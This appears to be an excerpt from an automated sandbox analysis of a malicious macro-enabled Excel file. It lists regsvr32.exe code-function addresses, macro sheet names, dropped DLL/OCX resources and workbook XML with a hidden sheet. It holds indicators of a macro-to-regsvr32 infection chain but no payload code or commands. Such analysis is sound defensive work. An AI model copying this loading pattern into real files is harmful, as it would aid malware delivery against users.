Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_002772CC	8_2_002772CC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028DAD8	8_2_0028DAD8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00283CDD	8_2_00283CDD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_002788DF	8_2_002788DF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0027CED8	8_2_0027CED8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0027BB23	8_2_0027BB23
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028112D	8_2_0028112D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00279133	8_2_00279133
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00271930	8_2_00271930
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028C535	8_2_0028C535
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00274700	8_2_00274700
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00271B09	8_2_00271B09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00273F09	8_2_00273F09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00273511	8_2_00273511
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00285D68	8_2_00285D68
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028C16B	8_2_0028C16B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00280F7A	8_2_00280F7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0027E379	8_2_0027E379
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0027D346	8_2_0027D346
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028D14C	8_2_0028D14C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00274342	8_2_00274342
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00281DA6	8_2_00281DA6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0027E1A9	8_2_0027E1A9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00274BB4	8_2_00274BB4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028AFB0	8_2_0028AFB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028E18B	8_2_0028E18B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0027F784	8_2_0027F784
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00279B80	8_2_00279B80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00289184	8_2_00289184
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028B384	8_2_0028B384
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00275995	8_2_00275995
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00277599	8_2_00277599
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_002851E8	8_2_002851E8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_002809F9	8_2_002809F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_002913FD	8_2_002913FD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_002863F0	8_2_002863F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_002903F2	8_2_002903F2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_002841CF	8_2_002841CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0027F1D5	8_2_0027F1D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_002927DF	8_2_002927DF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0027C7D1	8_2_0027C7D1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_00281FD0	8_2_00281FD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_002847D2	8_2_002847D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CCB4FC	9_2_00CCB4FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDEAA3	9_2_00CDEAA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC6CBB	9_2_00CC6CBB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC66B0	9_2_00CC66B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CCBE09	9_2_00CCBE09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD0418	9_2_00CD0418
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CCF1D5	9_2_00CCF1D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD1FD0	9_2_00CD1FD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD09F9	9_2_00CD09F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD63F0	9_2_00CD63F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CCE1A9	9_2_00CCE1A9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDD14C	9_2_00CDD14C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CCD346	9_2_00CCD346
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CE110E	9_2_00CE110E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC4700	9_2_00CC4700
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC3511	9_2_00CC3511
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC72CC	9_2_00CC72CC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD3CDD	9_2_00CD3CDD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CCCED8	9_2_00CCCED8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDDAD8	9_2_00CDDAD8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CE1AE9	9_2_00CE1AE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC88E5	9_2_00CC88E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC18F6	9_2_00CC18F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDBAF2	9_2_00CDBAF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC6A8D	9_2_00CC6A8D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC508B	9_2_00CC508B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDB687	9_2_00CDB687
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CCD899	9_2_00CCD899
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDEC9B	9_2_00CDEC9B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC5C9A	9_2_00CC5C9A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD5497	9_2_00CD5497
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD0097	9_2_00CD0097
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD16AD	9_2_00CD16AD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDA4B5	9_2_00CDA4B5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDD6B1	9_2_00CDD6B1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDF24C	9_2_00CDF24C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CE225A	9_2_00CE225A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC3C51	9_2_00CC3C51
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CE086F	9_2_00CE086F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CE0E6D	9_2_00CE0E6D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC1865	9_2_00CC1865
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDF060	9_2_00CDF060
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC8C7C	9_2_00CC8C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD0C7C	9_2_00CD0C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC2279	9_2_00CC2279
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC4E77	9_2_00CC4E77
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD7473	9_2_00CD7473
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CCB200	9_2_00CCB200
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CCA01C	9_2_00CCA01C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CE1E19	9_2_00CE1E19
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDB215	9_2_00CDB215
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC9617	9_2_00CC9617
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDDE11	9_2_00CDDE11
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDE612	9_2_00CDE612
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD882F	9_2_00CD882F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CCF43B	9_2_00CCF43B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD41CF	9_2_00CD41CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CE27DF	9_2_00CE27DF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CCC7D1	9_2_00CCC7D1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD47D2	9_2_00CD47D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD51E8	9_2_00CD51E8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CE13FD	9_2_00CE13FD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CE03F2	9_2_00CE03F2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDE18B	9_2_00CDE18B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CCF784	9_2_00CCF784
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDB384	9_2_00CDB384
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD9184	9_2_00CD9184
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC7786	9_2_00CC7786
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC9B80	9_2_00CC9B80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC7599	9_2_00CC7599
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC5995	9_2_00CC5995
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD95A8	9_2_00CD95A8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD1DA6	9_2_00CD1DA6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC4BB4	9_2_00CC4BB4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDAFB0	9_2_00CDAFB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC4342	9_2_00CC4342
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CCDB59	9_2_00CCDB59
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD5D68	9_2_00CD5D68
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDC16B	9_2_00CDC16B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CCE379	9_2_00CCE379
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD0F7A	9_2_00CD0F7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC3F09	9_2_00CC3F09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC1B09	9_2_00CC1B09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD112D	9_2_00CD112D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CD692B	9_2_00CD692B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CCBB23	9_2_00CCBB23
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDC535	9_2_00CDC535
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC1930	9_2_00CC1930
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CC9133	9_2_00CC9133
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0024BE09	10_2_0024BE09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00250418	10_2_00250418
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025EAA3	10_2_0025EAA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002466B0	10_2_002466B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00246CBB	10_2_00246CBB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0024B4FC	10_2_0024B4FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00244700	10_2_00244700
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0026110E	10_2_0026110E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00243511	10_2_00243511
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0024D346	10_2_0024D346
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025D14C	10_2_0025D14C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0024E1A9	10_2_0024E1A9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002563F0	10_2_002563F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002509F9	10_2_002509F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0024F1D5	10_2_0024F1D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00251FD0	10_2_00251FD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025882F	10_2_0025882F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0024F43B	10_2_0024F43B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0024B200	10_2_0024B200
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025B215	10_2_0025B215
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00249617	10_2_00249617
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025DE11	10_2_0025DE11
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025E612	10_2_0025E612
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0024A01C	10_2_0024A01C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00261E19	10_2_00261E19
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00241865	10_2_00241865
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025F060	10_2_0025F060
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0026086F	10_2_0026086F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00260E6D	10_2_00260E6D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00244E77	10_2_00244E77
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00257473	10_2_00257473
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00248C7C	10_2_00248C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00250C7C	10_2_00250C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00242279	10_2_00242279
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025F24C	10_2_0025F24C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00243C51	10_2_00243C51
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0026225A	10_2_0026225A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002516AD	10_2_002516AD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025A4B5	10_2_0025A4B5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025D6B1	10_2_0025D6B1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025B687	10_2_0025B687
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00246A8D	10_2_00246A8D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0024508B	10_2_0024508B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00255497	10_2_00255497
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00250097	10_2_00250097
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0024D899	10_2_0024D899
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025EC9B	10_2_0025EC9B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00245C9A	10_2_00245C9A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002488E5	10_2_002488E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00261AE9	10_2_00261AE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002418F6	10_2_002418F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025BAF2	10_2_0025BAF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002472CC	10_2_002472CC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00253CDD	10_2_00253CDD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0024CED8	10_2_0024CED8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025DAD8	10_2_0025DAD8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0024BB23	10_2_0024BB23
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025112D	10_2_0025112D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025692B	10_2_0025692B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025C535	10_2_0025C535
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00241930	10_2_00241930
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00249133	10_2_00249133
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00243F09	10_2_00243F09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00241B09	10_2_00241B09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00255D68	10_2_00255D68
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025C16B	10_2_0025C16B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0024E379	10_2_0024E379
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00250F7A	10_2_00250F7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00244342	10_2_00244342
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0024DB59	10_2_0024DB59
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00251DA6	10_2_00251DA6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002595A8	10_2_002595A8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00244BB4	10_2_00244BB4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025AFB0	10_2_0025AFB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0024F784	10_2_0024F784
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025B384	10_2_0025B384
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00259184	10_2_00259184
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00247786	10_2_00247786
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00249B80	10_2_00249B80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025E18B	10_2_0025E18B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00245995	10_2_00245995
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_00247599	10_2_00247599
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002551E8	10_2_002551E8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002603F2	10_2_002603F2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002613FD	10_2_002613FD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002541CF	10_2_002541CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0024C7D1	10_2_0024C7D1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002547D2	10_2_002547D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_002627DF	10_2_002627DF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004ABE09	11_2_004ABE09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004B0418	11_2_004B0418
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004AB4FC	11_2_004AB4FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004BEAA3	11_2_004BEAA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004A6CBB	11_2_004A6CBB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004A66B0	11_2_004A66B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004BD14C	11_2_004BD14C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004AD346	11_2_004AD346
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004C110E	11_2_004C110E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004A4700	11_2_004A4700
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004A3511	11_2_004A3511
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004B1FD0	11_2_004B1FD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004AF1D5	11_2_004AF1D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004B09F9	11_2_004B09F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004B63F0	11_2_004B63F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004AE1A9	11_2_004AE1A9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004BF24C	11_2_004BF24C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004C225A	11_2_004C225A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004A3C51	11_2_004A3C51
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004C0E6D	11_2_004C0E6D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004C086F	11_2_004C086F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004BF060	11_2_004BF060
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004A1865	11_2_004A1865
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004A2279	11_2_004A2279
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004A8C7C	11_2_004A8C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004B0C7C	11_2_004B0C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004B7473	11_2_004B7473
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004A4E77	11_2_004A4E77
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004AB200	11_2_004AB200
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004C1E19	11_2_004C1E19
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004AA01C	11_2_004AA01C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004BE612	11_2_004BE612
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004BDE11	11_2_004BDE11
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004A9617	11_2_004A9617
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004BB215	11_2_004BB215
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004B882F	11_2_004B882F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004AF43B	11_2_004AF43B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004A72CC	11_2_004A72CC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004ACED8	11_2_004ACED8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004BDAD8	11_2_004BDAD8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004B3CDD	11_2_004B3CDD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004C1AE9	11_2_004C1AE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004A88E5	11_2_004A88E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004BBAF2	11_2_004BBAF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004A18F6	11_2_004A18F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004A508B	11_2_004A508B

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 1001E302 appears 46 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 1004764D appears 190 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 100491EC appears 53 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 10047680 appears 34 times

Source: DETAILS-0203.xlsm	Macro extractor: Sheet name: Je1
Source: DETAILS-0203.xlsm	Macro extractor: Sheet name: Je2
Source: DETAILS-0203.xlsm	Macro extractor: Sheet name: EFALGV
Source: DETAILS-0203.xlsm	Macro extractor: Sheet name: EFALGV
Source: DETAILS-0203.xlsm	Macro extractor: Sheet name: Je1

Source: uVyr9TJj[1].dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: uVyr9TJj[1].dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sei.ocx.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sei.ocx.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: workbook.xml

Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22527"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\File\1mar\CIR-ZV\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{BB1DE8A2-6C62-497D-9C8A-3A65EB24A263}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" firstSheet="1" activeTab="1" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Vfrbuk1" sheetId="2" state="hidden" r:id="rId1"/><sheet name="Sheet" sheetId="8" r:id="rId2"/><sheet 